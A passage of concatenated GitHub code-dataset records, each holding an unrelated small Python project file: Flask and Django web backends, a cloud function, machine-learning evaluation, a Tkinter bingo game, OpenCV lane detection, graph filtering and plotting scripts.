list(db.memoList.find({},{'_id' :False}))\n return jsonify({'result': 'success', 'list': result})\n \n\n\n@app.route('/memo/add',methods=['POST'])\ndef add_card():\n\n \n title = request.form['title']\n result = list(db.memoList.find({'title':title},{'_id' : False}))\n if len(result) > 0:\n return jsonify({'result' : 'fail'})\n text = request.form['text']\n seq = db.counters.find({})[0]['seq']\n \n doc = {\n '_id': seq,\n 'title' : title,\n 'text' : text,\n\n }\n db.memoList.insert_one(doc)\n db.counters.update_one({'seq':seq}, {'$set': {'seq': (seq+1)}})\n\n\n\n return jsonify({'result' : 'success','seq':seq})\n\n\n@app.route('/memo/update', methods=['POST'])\ndef update_list():\n first = request.form['first']\n title = request.form['title']\n text = request.form['text']\n \n result = list(db.memoList.find({'title':title},{'_id' : False}))\n if len(result) > 0 and first != title:\n return jsonify({'result' : 'fail'})\n db.memoList.update_one({'title':first},{'$set': {\"text\": text,\"title\": title}})\n return jsonify({'result': 'success'})\n\n\n@app.route('/memo/delete', methods=['POST'])\ndef delete_list():\n\n title = request.form['title']\n db.memoList.delete_one({'title' : title})\n\n return jsonify({'result': 'success'})\n\nif __name__ == '__main__': \n app.run('0.0.0.0',port=5000,debug=True)","repo_name":"wnstn819/webMemo","sub_path":"holo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39799597686","text":"#requirements.txt\n\"\"\"\n# Function dependencies, for example:\n# package>=version\ncoverage\ndatetime\npycodestyle\npytest\npytest-cov\npytest-mock\npython-dateutil\npytz\nfirebase_admin\ngoogle-cloud-pubsub\n\"\"\"\n\nimport base64\nimport json\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil.parser import parse\nimport pytz\nimport sys\nfrom time import sleep\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom google.cloud import pubsub_v1\n\ndef base64decoder(encoded_data):\n decoded_string = base64.b64decode(encoded_data)\n print(decoded_string)\n return decoded_string\n \n\n\ndef find_flights(event, context):\n try:\n # Set current time to compare against flight records\n current_time=datetime.utcnow()\n # Move forward one minute to check within the next minute\n current_time_plus1=current_time + timedelta(minutes=1) \n\n #Decode message from Cloud Scheduler\n event = base64decoder(event['data'])\n event = json.loads(event)\n if event['reservation_number'] == 'Priming':\n print(\"Checking for flights...\")\n else:\n print(\"Cloud Scheduler sent unidentified data.\")\n\n if not firebase_admin._apps:\n firebase_admin.initialize_app()\n db = firestore.client()\n\n flights = db.collection(u'Flights').where(u'checkin_time', u'>=', current_time).where(u'checkin_time', u'<=', current_time_plus1).stream()\n\n # To Do\n project_id = \"GCPPROJECT\"\n topic_id = \"YOURTOPIC\"\n\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project_id, topic_id)\n\n\n flights_detected = False\n\n # For any flights found, send them to Pub/Sub\n for flight in flights:\n flights_detected = True\n del flight._data['checkin_time']\n flight_json = json.dumps(flight._data)\n print(\"Found flight: \" + flight.id)\n message = flight_json\n # Data must be a bytestring\n message = message.encode(\"utf-8\")\n print(message)\n # When you publish a message, the client returns a future.\n future = publisher.publish(topic_path, data=message)\n print(future.result())\n\n if flights_detected == False:\n print(\"No flights flound\")\n\n\n return(\"Checked for flights.\")\n\n except Exception as e:\n sleep(8)\n raise e","repo_name":"nrlcode/swgcp","sub_path":"Cloud Functions/check_for_flights.py","file_name":"check_for_flights.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113597648","text":"import pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import classification_report\n\nfrom src.hyperopt import optimize\n\n\ndef fit_gb(X, y, optimize_params=False):\n gb = GradientBoostingClassifier()\n if optimize_params:\n best_estim_ = optimize(gb, X, y)\n return best_estim_\n gb.fit(X, y)\n return gb\n\n\ndef evaluate(model, X, y):\n ypred = model.predict(X)\n return classification_report(y, ypred)\n\n\ndef generate_submission_output(trainset, devset, predictors, target, model=None):\n if model is None:\n model = fit_gb(trainset[predictors], trainset[target])\n ypred = model.predict(devset[predictors])\n devset_system_output = pd.DataFrame(\n {\"fileid\": devset[\"fileid\"], \"distance\": ypred})\n devset_system_output.to_csv(\n \"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n )\n return devset_system_output\n\n\ndef dual_evaluation(trainset, testset, predictors, target,\n save_system_output=True, optimize_params=False):\n report, predictions = {}, {}\n for cg in [0, 1]:\n _trainset = trainset[trainset[\"CoarseGrain\"] == cg]\n _testset = testset[testset[\"CoarseGrain\"] == cg]\n\n _model = fit_gb(\n _trainset[predictors], _trainset[target], optimize_params=optimize_params)\n _ypred = _model.predict(_testset[predictors])\n predictions.update(\n {fileid: pred for fileid, pred in zip(\n _testset.fileid.values, _ypred)}\n )\n report[f\"cg={cg}\"] = classification_report(_testset[target], _ypred)\n report[f\"model:cg={cg}\"] = _model\n report[f\"trainset:cg={cg}\"] = _trainset\n report[f\"testset:cg={cg}\"] = _testset\n devset_system_output = pd.DataFrame(\n {\n \"fileid\": testset[\"fileid\"],\n \"distance\": testset.apply(lambda row: predictions[row.fileid], axis=1),\n }\n )\n if save_system_output:\n devset_system_output.to_csv(\n \"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n )\n return report, devset_system_output\n\n\ndef evaluate_prediction(devset, prediction, save_system_output=True):\n report = classification_report(devset.Distance, prediction)\n system_output = pd.DataFrame(\n {\"fileid\": devset[\"fileid\"], \"distance\": prediction})\n if save_system_output:\n system_output.to_csv(\n \"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n )\n return report, system_output\n","repo_name":"Michael-OMahony/ml-labs-bootcamp-group-5","sub_path":"src/models/evaluate_xgb.py","file_name":"evaluate_xgb.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24636116216","text":"bees = [int(x) for x in input().split()]\nhornets = [int(x) for x in input().split()]\nfor i in range(len(bees)):\n if sum(hornets) > bees[i]:\n bees[i] = 0\n else:\n bees[i] -= sum(hornets)\n hornets.pop(0)\nbees = list(filter(lambda x: x > 0, bees))\nprint(*bees, sep=' ') if len(bees) > 0 else print(*hornets, sep=' ')\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Aditional_Exercises/2017_Extended/Lists_Algorithms/Hornet_Assault.py","file_name":"Hornet_Assault.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71190879847","text":"import openpyxl\nfrom datetime import date\nfrom typing import List\n\nfrom device import Device\nimport mail\n\n\ndef import_from_excel(spreadsheet: str) -> List[Device]:\n # Open spreadsheet and get input sheet\n wb = openpyxl.load_workbook(spreadsheet)\n sheet = wb.active\n\n devices = []\n\n for row in range(2, sheet.max_row + 1):\n # Each row in the spreadsheet has data for one device.\n host = sheet[f'A{row}'].value\n ip = sheet[f'C{row}'].value\n snmp_group = sheet[f'D{row}'].value\n mysql_user = sheet[f'I{row}'].value\n mysql_password = sheet[f'J{row}'].value\n\n device = Device(row - 1, host, ip, snmp_group,\n mysql_user=mysql_user, mysql_password=mysql_password)\n devices.append(device)\n\n return devices\n\n\ndef assign_open_closed(sheet, column, row, value):\n if value:\n sheet[f'{column}{row}'] = 'open'\n else:\n sheet[f'{column}{row}'] = 'closed'\n\n\ndef export_to_excel(devices: List[Device], spreadsheet: str = None):\n if spreadsheet is None:\n wb = openpyxl.Workbook()\n sheet = wb.active\n else:\n wb = openpyxl.load_workbook(spreadsheet)\n sheet_name = f'{date.today().isoformat()}_check'\n sheet = wb.create_sheet(title=sheet_name)\n\n sheet['A1'] = 'name'\n sheet['B1'] = 'managementip'\n sheet['C1'] = 'state'\n sheet['D1'] = 'snmp'\n sheet['E1'] = 'ssh'\n sheet['F1'] = 'mysql'\n sheet['G1'] = 'errors'\n\n for idx, device in enumerate(devices):\n sheet[f'A{idx + 2}'] = device.host\n sheet[f'B{idx + 2}'] = device.ip\n\n if device.alive:\n sheet[f'C{idx + 2}'] = 'up'\n else:\n sheet[f'C{idx + 2}'] = 'down'\n\n assign_open_closed(sheet, 'D', idx + 2, device.snmp)\n assign_open_closed(sheet, 'E', idx + 2, device.ssh)\n assign_open_closed(sheet, 'F', idx + 2, device.mysql)\n\n sheet[f'G{idx + 2}'] = device.errors\n\n wb.save(f'{date.today().isoformat()}_check.xlsx')\n\n if spreadsheet is not None:\n try:\n mail.send(f'{date.today().isoformat()}_check.xlsx')\n except Exception as e:\n print(f'Error sending email: {e}')\n","repo_name":"thomasvincent/python-auto-discover-network-Device-Management","sub_path":"spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42372128185","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom beer_collector.account.managers import CustomAccountManager\n\n\nclass Account(AbstractBaseUser, PermissionsMixin):\n email = models.EmailField(\n _('email address'),\n max_length=60,\n unique=True,\n )\n date_joined = models.DateTimeField(\n _('date joined'),\n auto_now_add=True,\n )\n last_login = models.DateTimeField(\n _('last login'),\n auto_now=True,\n )\n is_active = models.BooleanField(\n _('active'),\n default=True,\n )\n is_staff = models.BooleanField(\n _('staff'),\n default=False,\n )\n is_superuser = models.BooleanField(\n _('superuser'),\n default=False\n )\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n\n objects = CustomAccountManager()\n","repo_name":"momchilantonov/BeerCollector","sub_path":"beer_collector/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39142678273","text":"sb1,sb2=input().split() \nsb1=int(sb1) \nsb2=int(sb2) \nv=list(map(int,input().split()))\ncount=0 \nfor i in range(len(v)):\n for j in range(i+1,len(v)):\n if (v[i]+v[j]==sb2):\n count+=1\n break\nif(count):\n print(\"yes\")\nelse:\n print(\"no\")\n","repo_name":"jesusble/project","sub_path":"sb.py","file_name":"sb.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11299157981","text":"#Crie um programa que leia dois valores e mostre um menu na tela:\n#[ 1 ] somar\n#[ 2 ] multiplicar\n#[ 3 ] maior\n#[ 4 ] novos números\n#[ 5 ] sair do programa\n#Seu programa deverá realizar a operação solicitada em cada caso.##\nescolha = 0\nn1 = int(input('digite um numero: '))\nn2 = int(input('digite um segundo valor: '))\n\nprint('''[1] somar\n[2] multiplicar\n[3] maior\n[4] novos m]numeros\n[5] sair do programa''')\nwhile escolha != 5:\n escolha = int(input('qual a sua opçao: '))\n\n if escolha == 1:\n print('{}'.format(n1 + n2))\n elif escolha == 2:\n print('{}'. format(n1 * n2))\n elif escolha == 3:\n if n1 > n2:\n print('{} e o maior valor digitado'.format(n1))\n if n2 > n1:\n print('{} e o maior valor digitado'.format(n2))\n elif escolha == 4:\n print('digite novos valores')\n n1 = int(input('digite um numero: '))\n n2 = int(input('digite um segundo valor: '))\n elif escolha == 5:\n print('saindo....')\n else:\n print(' escolha invalida')\n\nprint('Fim do programa,Volte sempre')","repo_name":"LindomarB/Curso-em-video-python-git","sub_path":"pythonexercicios/ex059 menu de opcoes.py","file_name":"ex059 menu de opcoes.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144992228","text":"import pygal\r\nfrom die import Die\r\n\r\ndie = Die()\r\n\r\n# make some rolls and store results in a list\r\nresults = []\r\nfor roll_num in range(1000): # increase number of simulated rolls to 1000\r\n ans = die.roll()\r\n results.append(ans)\r\n\r\n# analyse the results\r\nfrequencies = []\r\nfor value in range(1,die.num_sides+1): # loop through possible values\r\n frequency = results.count(value) # count how many times each value appears\r\n frequencies.append(frequency) # append values to frequencies\r\n\r\n# Visualise the results\r\nhist = pygal.Bar() # create instance of pygal.Bar() abd store in hist # .bar() represents bar graph\r\n\r\nhist.title = \"Results of rolling one D6 n times\"\r\nhist.x_labels = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]\r\nhist.x_title = \"Results\"\r\nhist.y_labels = \"Frequency of Results\"\r\n\r\nhist.add(\"D6\", frequencies) # add series of values to chart\r\nhist.render_to_file(\"die_visual.svg\")\r\n","repo_name":"JamCrumpet/Lesson-notes","sub_path":"lesson 11 generating data/11.17_making_a_histogram.py","file_name":"11.17_making_a_histogram.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7162166735","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# # Planar Maximally Filtered Graph (PMFG)\n# %% [markdown]\n# ### Import requirements: planarity and networkx\n\n# %%\nimport time\nimport planarity\nimport networkx as nx\n\n# %% [markdown]\n# ### define the function to compute PMFG\n# #### Firstly, we need to sort the graph with respect to weights in descending order\n\n# %%\ndef sort_graph_edges_corr(G):\n sorted_edges = []\n # if method == 'corr':\n tmp = sorted(G.edges(data=True), key=lambda x: x[2]['weight'], reverse = True)\n for source, dest, data in tmp: # in descending order!\n # print(data)\n sorted_edges.append({'source': source,\n 'dest': dest,\n 'weight': data['weight']})\n # print(sorted_edges)\n return sorted_edges\n\n#%%\ndef sort_graph_edges_distance(G):\n sorted_edges = []\n # if method == 'corr':\n tmp = sorted(G.edges(data=True), key=lambda x: x[2]['weight'], reverse = False)\n for source, dest, data in tmp: # in descending order!\n # print(data)\n sorted_edges.append({'source': source,\n 'dest': dest,\n 'weight': data['weight']})\n # print(sorted_edges)\n return sorted_edges\n\n# %% [markdown]\n# #### the main function to compute PMFG. FIrstly, we sort the graph edges then add edges in descending order and check if the PMFG is planar. if not, we get rid of the edge from the PMFG\n\n# %%\ndef compute_PMFG(G):\n PMFG = nx.Graph() # initialize\n ne_total = G.number_of_edges()\n nb_nodes = len(G.nodes)\n ne_pmfg = 3*(nb_nodes-2)\n sorted_edges = sort_graph_edges_corr(G)\n t0 = time.time()\n for i, edge in enumerate(sorted_edges):\n PMFG.add_edge(edge['source'], edge['dest'], weight = edge['weight'])\n if not planarity.is_planar(PMFG):\n PMFG.remove_edge(edge['source'], edge['dest'])\n ne = PMFG.number_of_edges()\n print(\"Generating PMFG... added edges in PMFG %d/%d (%.2f%%) lookup edges in G %d/%d (%.2f%%) Elapsed TIme %.2f [sec]\" %(ne, ne_pmfg, (ne/ne_pmfg)*100, i, ne_total, (i+1/ne_total)*100, time.time()-t0), end=\"\\r\")\n if ne == ne_pmfg:\n break\n return PMFG\n\n# %% [markdown]\n# ## Example of generating PMFG\n\n# # %%\n# G = nx.random_geometric_graph(200,0.3)\n# import random\n# for (u,v,w) in G.edges(data=True):\n# G.edges[u,v]['weight'] = random.randint(1,10) # assign random weighted edge\n\n\n# # %%\n# get_ipython().run_line_magic('matplotlib', 'inline')\n# import matplotlib as plt\n\n# # find node near center (0.5,0.5)\n# dmin = 1\n# ncenter = 0\n# pos = nx.get_node_attributes(G, \"pos\")\n# for n in pos:\n# x, y = pos[n]\n# d = (x - 0.5) ** 2 + (y - 0.5) ** 2\n# if d < dmin:\n# ncenter = n\n# dmin = d\n\n# p = dict(nx.single_source_shortest_path_length(G, ncenter))\n\n# nx.draw_networkx_edges(G, pos, nodelist=[ncenter], alpha=0.4)\n# nx.draw_networkx_nodes(\n# G,\n# pos,\n# nodelist=list(p.keys()),\n# node_size=80,\n# node_color=list(p.values()),\n# cmap=plt.cm.Reds_r,\n# )\n\n\n# # %%\n# PMFG = compute_PMFG(G)\n\n\n# # %%\n# # find node near center (0.5,0.5)\n# dmin = 1\n# ncenter = 0\n# for n in pos:\n# x, y = pos[n]\n# d = (x - 0.5) ** 2 + (y - 0.5) ** 2\n# if d < dmin:\n# ncenter = n\n# dmin = d\n\n# p = dict(nx.single_source_shortest_path_length(PMFG, ncenter))\n\n# nx.draw_networkx_edges(PMFG, pos, alpha=0.4)\n# nx.draw_networkx_nodes(\n# PMFG,\n# pos,\n# nodelist=list(p.keys()),\n# node_size=80,\n# node_color=list(p.values()),\n# cmap=plt.cm.Reds_r,\n# )\n\n\n","repo_name":"Chang-Tong/System-Risk-by-Network-View","sub_path":"stock_data/make_pmfg.py","file_name":"make_pmfg.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"25640917230","text":"# -*-coding:utf-8-*-\n\nfrom . import api\nfrom flask import request, g, jsonify, current_app, session\nfrom ihome.util.commens import login_required\nfrom ihome.response_code import RET\nfrom ihome.models import User\nfrom ihome.util.storage_image import storage\nfrom ihome import db, constants\nimport re\n\n\n@api.route('/users/avatar', methods=['POST'])\n@login_required\ndef set_avatar():\n u'''\n 参数: 图片(多媒体表单), user_id(g.user_id)\n :return:\n '''\n # 获取数据\n avatar = request.files.get('avatar')\n user_id = g.user_id\n\n # 校验数据\n if avatar is None:\n return jsonify(errno=RET.NODATA, errmsg=u'图片未上传')\n\n # 业务处理\n # 上传文件\n image_data = avatar.read()\n try:\n file_name = storage(image_data)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg=u'图片上传失败')\n\n # 保存文件路径\n try:\n user = User.query.filter_by(id=user_id).update({'avatar_url': file_name})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'图片存储失败')\n\n # 返回响应\n avatar_url = constants.QINIU_URL_DOMIN + file_name\n return jsonify(errno=RET.OK, errmsg=u'上传成功', data={'avatar_url': avatar_url})\n\n\n@api.route('/users/name', methods=['PUT'])\n@login_required\ndef change_user_name():\n # 获取数据\n user_id = g.user_id\n req_data = request.get_json()\n\n # 校验数据\n if not req_data:\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数不完整')\n\n username = req_data.get('username')\n if not username:\n return jsonify(errno=RET.PARAMERR, errmsg=u'用户名不能为空')\n\n # 业务处理: 更改用户名\n try:\n User.query.filter_by(id=user_id).update({'name': username})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'用户名更改失败')\n\n # 返回响应\n session['name'] = username\n return jsonify(errno=RET.OK, errmsg=u'保存成功')\n\n\n@api.route('/user', methods=['GET'])\n@login_required\ndef get_user_info():\n user_id = g.user_id\n user = User.query.get(user_id)\n\n if user is None:\n return jsonify(errno=RET.NODATA, errmsg=u'用户不存在')\n\n return jsonify(errno=RET.OK, errmsg=u'查询成功', data=user.to_dict())\n\n\n@api.route('/users/auth', methods=['GET'])\n@login_required\ndef get_auth():\n user_id = g.user_id\n\n user = User.query.get(user_id)\n if user is None:\n return jsonify(errno=RET.NODATA, errmsg=u'用户不存在')\n\n return jsonify(errno=RET.OK, errmsg=u'查询成功', data=user.auth_to_dict())\n\n\n@api.route('/users/auth', methods=['POST'])\n@login_required\ndef set_auth():\n u'''\n 获取参数: real_name, id_card 格式:json\n :return:\n '''\n # 获取数据\n user_id = g.user_id\n real_name = request.form.get('real_name')\n id_card = request.form.get('id_card')\n\n # 数据校验\n if not all([real_name, id_card]):\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数不完整')\n\n if not re.match(r'^[1-9]\\d{7}((0\\d)|(1[0-2]))(([0|1|2]\\d)|3[0-1])\\d{3}$|^[1-9]\\d{5}[1-9]\\d{3}((0\\d)|(1[0-2]))(([0|1|2]\\d)|3[0-1])\\d{3}([0-9]|X)$', id_card):\n return jsonify(errno=RET.PARAMERR, errmsg=u'身份证格式错误')\n\n # 业务处理: 存储认证信息\n try:\n update_result = User.query.filter_by(id=user_id, real_name=None, id_card=None)\\\n .update({'real_name': real_name, 'id_card': id_card})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'认证信息存储失败')\n\n if update_result == 0:\n return jsonify(errno=RET.ROLEERR, errmsg=u'不可重复认证')\n\n # 返回响应\n return jsonify(errno=RET.OK, errmsg=u'认证成功')\n\n","repo_name":"shenxuexin/flask_ihome","sub_path":"ihome/api_1_0/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5210149408","text":"from dame.stages import Stages\n\nfrom .test_classes import PlusOne, PlusTwo, ThreeNums\n\n\ndef test_dag():\n stages = Stages(ThreeNums, (PlusTwo, PlusOne))\n assert list(iter(stages)) == [\n PlusOne,\n PlusTwo,\n ]\n assert list(stages.to(\"p1\")) == [PlusOne]\n","repo_name":"malpunek/dame","sub_path":"tests/test_stages.py","file_name":"test_stages.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36186798678","text":"import random\r\nimport tkinter as tk\r\nfrom tkinter import scrolledtext\r\n\r\nclass BingoApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Bingo Game\")\r\n self.root.geometry(\"800x600\") #ウインドウサイズ\r\n \r\n self.used_numbers = set()\r\n self.remaining_numbers = set(range(1, 76))\r\n self.past_numbers = []\r\n \r\n self.label = tk.Label(root, text=\"\", font=(\"Arial\", 50))\r\n self.label.pack(pady=20)\r\n \r\n self.past_label = scrolledtext.ScrolledText(root, wrap=tk.WORD, width=30, height=10, font=(\"Arial\", 20))\r\n self.past_label.pack()\r\n \r\n self.start_button = tk.Button(root, text=\"Next\", command=self.pick_next_number, width=10, height=2, bg=\"light sky blue\", font=(\"Arial\", 14, \"bold\"))\r\n self.start_button.pack(pady=10)\r\n \r\n self.check_bingo()\r\n \r\n def pick_next_number(self):\r\n if len(self.remaining_numbers) > 0:\r\n num = random.choice(list(self.remaining_numbers))\r\n self.remaining_numbers.remove(num)\r\n self.used_numbers.add(num)\r\n self.past_numbers.append(num)\r\n self.label.config(text=str(num))\r\n self.update_past_numbers()\r\n self.check_bingo()\r\n else:\r\n self.label.config(text=\"ビンゴは終了です\")\r\n self.start_button.config(state=tk.DISABLED)\r\n \r\n def update_past_numbers(self):\r\n past_str = \", \".join(map(str, self.past_numbers))\r\n self.past_label.delete(1.0, tk.END) # 既存のテキストをクリア\r\n self.past_label.insert(tk.INSERT, f\" {past_str}\")\r\n \r\n def check_bingo(self):\r\n if len(self.used_numbers) == 75:\r\n self.label.config(text=\"ビンゴは終了です\")\r\n self.start_button.config(state=tk.DISABLED)\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = BingoApp(root)\r\n root.mainloop()\r\n","repo_name":"ill2659/bingo_03","sub_path":"bingo_app.py","file_name":"bingo_app.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69851560488","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[19]:\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\n# In[20]:\n\n\ndef canny(image):\n gray = cv2.cvtColor(lane_image, cv2.COLOR_RGB2GRAY)\n blur = cv2.GaussianBlur(gray, (5,5), 0)\n canny = cv2.Canny(blur, 50, 150)\n return canny\n\n\n# In[21]:\n\n\ndef display_lines(image,lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for line in lines:\n x1,y1,x2,y2 = line.reshape(4)\n cv2.line(line_image, (x1,y1), (x2,y2), (255,0,0), 10)\n return line_image\n\n\n# In[22]:\n\n\ndef region_of_interest(image):\n height = image.shape[0]\n width = image.shape[1]\n polygons = np.array([[(100, height),(1100, height), (600, 400)]])\n mask = np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\n\n# In[23]:\n\n\nimage = cv2.imread('test_image.png')\nplt.imshow(image, cmap = 'gray')\n\n\n# In[24]:\n\n\nlane_image = np.copy(image)\n\n\n# In[25]:\n\n\ncanny_image = canny(lane_image)\nplt.imshow(canny_image, cmap = 'gray')\n\n\n# In[26]:\n\n\ncropped_image = region_of_interest(canny_image)\nplt.imshow(cropped_image, cmap = 'gray')\n\n\n# In[27]:\n\n\ncropped_image_acc_gray = np.copy(cropped_image)\n# line_image_ = cv2.cvtColor(cropped_image_acc, cv2.COLOR_RGB2GRAY)\ncropped_image_acc_gray[cropped_image_acc_gray[:]<10] = 0\ncropped_image_acc_gray[cropped_image_acc_gray[:]>10] = 255\n\nplt.imshow(cropped_image_acc_gray, cmap = 'gray')\n\n\n# In[28]:\n\n\nlines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=5)\n\n\n# In[29]:\n\n\nline_image = display_lines(lane_image, lines)\nplt.imshow(line_image, cmap = 'gray')\n\n\n# In[30]:\n\n\nline_image_acc = np.copy(line_image)\nline_image_acc_gray = cv2.cvtColor(line_image_acc, cv2.COLOR_RGB2GRAY)\nline_image_acc_gray[line_image_acc_gray[:]<10] = 0\nline_image_acc_gray[line_image_acc_gray[:]>10] = 255\n\nplt.imshow(line_image_acc_gray, cmap = 'gray')\n\n\n# In[31]:\n\n\no_img = np.asarray(cropped_image_acc_gray)\np_img = np.asarray(line_image_acc_gray)\n\n\n# In[32]:\n\n\ndist = np.linalg.norm(o_img - p_img)\n\n\n# In[33]:\n\n\nAccuracy_percentage = 100 - dist/100\n\nAccuracy_percentage\n\n\n# In[34]:\n\n\ncombo_image = cv2.addWeighted(lane_image, 0.8, line_image, 1, 1)\nplt.imshow(combo_image, cmap = 'gray')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MarsRoboters/lane_line_detection_with_accracy-","sub_path":"Lane_line_detection_with_accuracy.py","file_name":"Lane_line_detection_with_accuracy.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40876178725","text":"import numpy as np\nimport math\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef GetPoints(DIRECTORY):\n f = open(DIRECTORY, \"r\")\n LINES, LINE = [],[]\n contents = f.readlines()\n for k in range(0,len(contents)):\n if contents[k][0] == \"l\":\n if LINE != []:\n LINES.append(LINE)\n LINE=[]\n else:\n LINE.append(contents[k].split(\"\\n\")[0].split(\",\"))\n return LINES\n\ndef GetLines(PL):\n N = len(PL)\n VECTORS=[]\n for j in range(0,N):\n VECTOR=[]\n for k in range (1, len(PL[j])):\n VECTOR.append([float(PL[j][k][0])-float(PL[j][k-1][0]),float(PL[j][k][1])-float(PL[j][k-1][1]),float(PL[j][k][2])-float(PL[j][k-1][2])])\n VECTORS.append(VECTOR)\n return VECTORS\n\ndef DotProduct3D(VECT1, VECT2):\n product = (VECT1[0]*VECT2[0])+(VECT1[1]*VECT2[1])+(VECT1[2]*VECT2[2])\n return product\n\ndef VectorRejection(VECT1, VECT2):\n MAG = math.sqrt((VECT1[0]-VECT2[0])**2+(VECT1[1]-VECT2[1])**2+(VECT1[2]-VECT2[2])**2)\n return MAG\n\n\ndef main():\n directory = '../lines.txt'\n\n toggleplot=1\n points_list = GetPoints(directory)\n line_list = GetLines(points_list)\n\n radius =5\n N_view = 120\n theta_inc = 2*math.pi/N_view\n azi_inc = theta_inc\n\n ViewPoints = np.empty((N_view, N_view, 3))\n Norms = np.empty((N_view, N_view, 3))\n Lengths = np.empty((N_view, N_view, len(line_list[0])))\n surprise = np.empty((N_view, N_view, 1))\n\n #Load the ViewPoints array, Norms array, and compute projection lengths\n for th in range(0,N_view):\n for az in range(0,N_view):\n ViewPoints[th, az] = [radius*math.cos(th*theta_inc)*math.sin(az*azi_inc),radius*math.sin(th*theta_inc)*math.sin(az*azi_inc),radius*math.cos(az*azi_inc)]\n Norms[th, az] = [-math.cos(th*theta_inc)*math.sin(az*azi_inc),-math.sin(th*theta_inc)*math.sin(az*azi_inc),-math.cos(az*azi_inc)]\n for inc1 in range(0,len(line_list)):\n LEN=0\n for inc2 in range(0,len(line_list[inc1])):\n Projection = DotProduct3D(Norms[th, az],line_list[inc1][inc2])\n Rejection = VectorRejection(line_list[inc1][inc2],Projection*Norms[th, az])\n LEN+=Rejection\n Lengths[th, az, inc1] = LEN\n surprise[th, az, 0] = Lengths[th, az, 1] - Lengths[th, az, 0]\n\n if toggleplot ==1:\n fig = plt.figure()\n ax = plt.axes(projection=\"3d\")\n ax.scatter3D(ViewPoints[:,:,0], ViewPoints[:,:,1], ViewPoints[:,:,2], color=\"green\")\n plt.title(\"View Points\")\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Lengths\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = 